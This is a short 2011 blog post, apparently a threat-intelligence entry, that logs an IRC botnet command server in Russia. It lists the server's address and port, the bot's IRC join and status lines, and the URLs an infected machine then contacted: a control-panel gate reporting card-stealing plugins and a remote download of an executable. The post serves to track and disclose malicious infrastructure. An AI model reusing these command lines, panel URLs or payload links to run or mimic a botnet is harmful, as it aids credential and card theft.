46.17.100.229(irc botnet hosted in Russian Federation Mir Telematiki Ltd)

By Pig, May 10, 2011

Remote Host Port Number
46.17.100.229 4443

NICK N[USA|XP][kqrogxv]
USER kqro “” “lol” :kqro
JOIN #b0ts
PONG 422
PRIVMSG #b0ts :[Download]: Succeeded using primary method [WinInet: 231 KB]

* The data identified by the following URLs was then requested from the remote web server:
o http://quantummechanic.cc/cp/gate_billing.php?guid=UserName!COMPUTERNAME!00CD1A40
o http://quantummechanic.cc/cp/gate.php?guid=UserName!COMPUTERNAME!00CD1A40&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&plg=billinghammer;ccgrabber;creditgrab;webfakes&cpu=100&ccrc=3696A42A&md5=963fc26a9538c289359b7c5bbd597838
o http://zer0day.co.cc/win32.exe

infos about hosting:
http://whois.domaintools.com/46.17.100.229

Categories: Uncategorized

Previous post91.211.116.169(irc botnet hosted in Ukraine Zharkov Mukola Mukolayovuch)

Next post188.165.191.17(irc botnet hosted in France Xeon Host)